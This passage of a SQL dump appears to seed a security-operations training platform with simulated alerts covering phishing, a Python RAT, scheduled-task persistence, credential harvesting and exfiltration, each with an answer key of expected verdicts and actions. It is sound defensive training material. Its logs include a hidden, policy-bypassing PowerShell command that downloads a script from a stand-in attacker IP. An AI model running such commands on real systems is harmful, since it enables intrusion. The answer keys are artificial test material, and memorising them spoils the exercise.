'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.794Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1086, 'Phishing Email with Malicious Attachment', 'medium', 'Email Gateway Logs', 'A spear-phishing email targeting military personnel was detected. The email contained a malicious attachment disguised as a legitimate document. The sender\'s IP is associated with previous phishing campaigns.', 'Social Engineering', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-16T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"destination_user\":\"john.doe@military.gov\",\"email_subject\":\"Urgent: Action Required\",\"attachment_name\":\"Official_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"sender_email\":\"trusted.source@domain.com\",\"recipient_email\":\"john.doe@military.gov\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP is linked to several phishing campaigns targeting government entities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash is associated with a known malicious document used in phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email address is spoofed and previously used in phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.795Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1087, 'Execution of Python-Based RAT', 'high', 'Endpoint Detection and Response (EDR)', 'A Python-based Remote Access Trojan (RAT) was executed on the victim\'s machine after a malicious attachment was opened. This action has established a foothold within the network, potentially allowing the attacker to gain further access.', 'Malware Execution', 'T1059.006 - Command and Scripting Interpreter: Python', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_type\":\"process_creation\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.42\",\"destination_ip\":\"203.0.113.56\",\"process_name\":\"python.exe\",\"command_line\":\"python.exe C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_rat.py\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_rat.py\",\"signature_status\":\"unsigned\",\"external_ip\":\"203.0.113.56\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with Python-based RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_rat.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"The file name indicates potential malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the alert.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1088, 'Establishing Persistence with Scheduled Tasks', 'medium', 'Windows Task Scheduler Logs', 'The Remote Access Trojan (RAT) has set up a scheduled task on the compromised system. This task ensures the malware is executed at regular intervals, even after system reboots, thereby maintaining persistent access.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":106,\"ProviderName\":\"Microsoft-Windows-TaskScheduler\",\"Channel\":\"Microsoft-Windows-TaskScheduler/Operational\",\"EventRecordID\":12345,\"Logged\":\"2023-10-15T14:32:10Z\",\"TaskName\":\"\\\\System\\\\CriticalUpdate\",\"TaskActionType\":\"Execute\",\"TaskContent\":{\"Command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Arguments\":\"/c C:\\\\Users\\\\Public\\\\malware.exe\",\"UserId\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"HostIP\":\"10.0.0.15\",\"AttackerIP\":\"203.0.113.45\",\"FileHash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"User\":\"compromisedUser\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash of the malware file executed by the scheduled task.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1089, 'Credential Harvesting and Lateral Movement', 'high', 'Network Traffic Analysis', 'The RAT begins harvesting credentials, allowing the attackers to move laterally across the network and compromise additional systems. Observed network traffic indicates the use of stolen credentials to access multiple internal systems.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:25:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"jdoe\",\"credentials_used\":true,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"credential_harvester.exe\",\"session_id\":\"abc123def456\",\"event_id\":\"EID1004\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as a credential harvesting tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Malware file used for credential harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1090, 'Data Exfiltration via Encrypted Channels', 'high', 'Firewall and Proxy Logs', 'In the final stage, sensitive data is exfiltrated out of the network using encrypted channels, completing the espionage operation. The attacker utilized encrypted HTTPS traffic to transfer data to a command and control server.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:45:00Z\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"protocol\":\"HTTPS\",\"hostname\":\"malicious-server.com\",\"uri\":\"/upload\",\"method\":\"POST\",\"user\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"sensitive_data.zip\",\"bytes_sent\":1048576}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1091, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email from a suspected attacker was detected. The email contained a malicious attachment designed to grant initial access to the bank\'s network. The attachment was flagged due to its similarity to known malware used by the Poseidon Group.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T09:15:32Z\",\"email_id\":\"e1234567890\",\"source_ip\":\"203.0.113.45\",\"source_email\":\"attack@poseidon-group.com\",\"destination_email\":\"employee@bank.com\",\"subject\":\"Urgent: Account Verification Required\",\"attachment_name\":\"Invoice_12345.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"attachment_blocked\",\"reason\":\"malicious_attachment_detected\"}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Poseidon Group.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attack@poseidon-group.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:22.801Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1092, 'Unauthorized PowerShell Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'An unauthorized PowerShell script execution was detected on host 192.168.1.45. The script was executed using a remote command initiated from a compromised account. The script tried to connect to an external IP 203.0.113.5, known for malicious activities, in an attempt to download additional payloads. This activity is part of an ongoing attempt to establish command and control within the network. Immediate attention and remediation are required to prevent further compromise.', 'Command and Control', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4625\",\"host\":\"192.168.1.45\",\"username\":\"jdoe\",\"process\":\"powershell.exe\",\"command_line\":\"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.WebClient).DownloadFile(\'http://203.0.113.5/malicious.ps1\', \'C:\\\\Users\\\\jdoe\\\\malicious.ps1\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"external_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\malicious.ps1\",\"alert_id\":\"alert-987654321\",\"alert_description\":\"Execution of a malicious PowerShell script detected.\"}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence 